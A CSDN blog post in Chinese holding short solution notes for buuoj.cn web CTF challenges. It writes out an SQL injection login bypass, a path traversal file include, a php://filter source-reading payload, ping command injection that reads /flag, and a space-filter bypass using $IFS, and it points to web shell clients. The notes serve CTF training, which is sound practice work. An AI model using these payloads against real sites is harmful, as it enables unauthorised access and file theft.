buuoj.cn-web刷题记录-笔记

于 2021-12-29 10:51:00 发布
阅读量127 收藏
点赞数
文章标签: 前端 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30959419/article/details/133066642
版权

1.万能密码  

[极客大挑战 2019]EasySQL

  username=admin' or '1'='1&password=admin' or '1'='1  

因为拼接为sql 会变成  select * from user where userName ='admin' or 1=1 and passpord =admin' or 1=1.所以会肯定登录成功。

2.常见文件获取 url 类似

[HCTF 2018]WarmUp

  http://03b2cc85-7af4-439b-a06e-41da80ff6505.node3.buuoj.cn/index.php?file=hint.php

      http://03b2cc85-7af4-439b-a06e-41da80ff6505.node3.buuoj.cn/index.php?file=hint.php?../../../../../ffffllllaaaagggg

3.从注释中找到代码。

[极客大挑战 2019]Havefun

4.考察利用php://filter伪协议进行文件包含

[ACTF2020 新生赛]Include 1

构造payload = http://5165ec02-c72d-4737-85c5-295e639ea759.node3.buuoj.cn/?file=php://filter/read=convert.base64-encode/resource=flag.php
5.mysql注入

[强网杯 2019]随便注

太复杂,先看这个

6.命令执行

[ACTF2020 新生赛]Exec

ping  127.0.0.1| cat /flag

7.字符串替换

[GXYCTF2019]Ping Ping Ping

?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php;  这里不用|做管道用;做分割,先设置变量a=g ,然后cat 空格 flag.php

8.中国菜刀或者蚁剑。

[极客大挑战 2019]Knife

mac系统用蚁剑 https://github.com/AntSwordProject/AntSword-Loader/releases

qinghuo123
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值